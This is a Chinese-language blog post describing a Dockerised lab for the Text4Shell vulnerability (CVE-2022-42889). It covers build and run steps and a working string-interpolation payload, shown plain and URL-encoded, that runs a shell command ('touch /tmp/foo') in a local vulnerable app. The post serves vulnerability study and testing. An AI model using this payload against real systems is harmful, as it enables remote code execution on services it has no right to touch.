CVE-2022-42889 Text4Shell的Docker化POC

作者:Sec-Labs | 发布时间:

项目地址

https://github.com/karthikuj/cve-2022-42889-text4shell-docker

安装 maven - maven-linux

  1. Maven 安装以创建 fat jar

mvn clean install

  1. Docker 构建

docker build --tag=text4shell .

  1. Docker运行

docker run -p 80:8080 text4shell

  1. 测试应用程序

http://localhost/text4shell/attack?search=<anything>

  1. 可以通过传递字符串“${prefix:name}”来执行攻击,其中前缀是上述查找:

${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}

http://localhost/text4shell/attack?search=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Ffoo%27%29%7D

  1. 您也可以尝试使用dnsorurl前缀。
  2. 获取容器id

docker container ls

  1. 进入应用程序

docker exec -it <container_id> bash

  1. foo检查上述 RCE 是否成功(您应该会看到在目录中创建了一个名为的/tmp文件):

ls /tmp/

  1. 停止容器

docker container stop <container_id>

标签:工具分享, 漏洞分享, POC脚本